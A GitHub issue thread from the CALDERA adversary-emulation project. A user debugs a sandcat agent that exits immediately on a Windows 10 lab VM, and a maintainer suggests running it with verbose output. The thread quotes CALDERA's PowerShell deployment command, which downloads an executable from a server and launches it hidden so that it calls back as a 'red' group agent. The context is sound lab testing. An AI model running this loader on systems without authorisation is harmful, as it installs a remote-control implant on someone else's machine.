### ISSUE TITLE
Unable to start sandcat agent on Win10

### ISSUE THREAD

**Issue by Maspital** [mitre/caldera#2104]
Hey there,

I'm using CALDERA within a setup consisting of several VirtualBox VMs. One of them is running Kali and hosts the CALDERA server, another one is running Windows 10 (all connected via internal networks). I noticed there was a similar issue [here](https://github.com/mitre/caldera/issues/1606), but sadly the solution didn't apply to my problem.

I'm trying to deploy the sandcat agent via the command provided by the GUI:
```powershell
$server="http://xxx.xxx.xxx.xxx:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$data=$wc.DownloadData($url);
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;
rm -force "C:\Users\Public\$name.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;
Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
```
After running this, a corresponding process is created and almost instantly disappears again. The new agent shows up in the web interface, but is marked as untrusted after the timer runs out (which makes sense, since the process simply doesn't exist anymore). When I'm hosting the CALDERA server on my own machine, everything _works as expected_, probably indicating the problem stems from the Kali VM, not from the Windows 10 VM? Maybe the generated executable is somehow faulty?

Kali VM:
- 12GB RAM, 4 cores
- CALDERA v3.0.0
- GO v1.13.10 linux/amd64
- Python v3.7.4
- all dependencies as described by [requirements.txt](https://github.com/mitre/caldera/blob/3.0.0/requirements.txt) (no virtualenv)

The CALDERA server is started via `python3 server.py --insecure --fresh`, and no errors show up during this phase. When deploying the agent, the following output is generated:
```sh
[...]
2021-04-06 12:5559 - INFO   (server.py:58 run_tasks) All systems ready.
# powershell-command executed on Win10 client
go: downloading github.com/grandcat/zeroconf v1.0.0
go: extracting github.com/grandcat/zeroconf v1.0.0
go: downloading github.com/miekg/dns v1.1.27
go: downloading golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa
go: downloading github.com/cenkalti/backoff v2.2.1+incompatible
go: extracting github.com/cenkalti/backoff v2.2.1+incompatible
go: extracting github.com/miekg/dns v1.1.27
go: downloading golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550
go: extracting golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa
go: downloading golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe
go: extracting golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550
go: extracting golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe
go: finding github.com/grandcat/zeroconf v1.0.0
go: finding github.com/cenkalti/backoff v2.2.1+incompatible
go: finding github.com/miekg/dns v1.1.27
go: finding golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550
go: finding golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa
go: finding golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe
```
Any help would be greatly appreciated :)

**Comment by uruwhy** [comment]
Could you try running the agent in the foreground with the `-v` flag for verbose output? It'll help narrow down what your issue is specifically. Something like `C:\Users\Public\yourbinaryname.exe -server yourserverip -v`
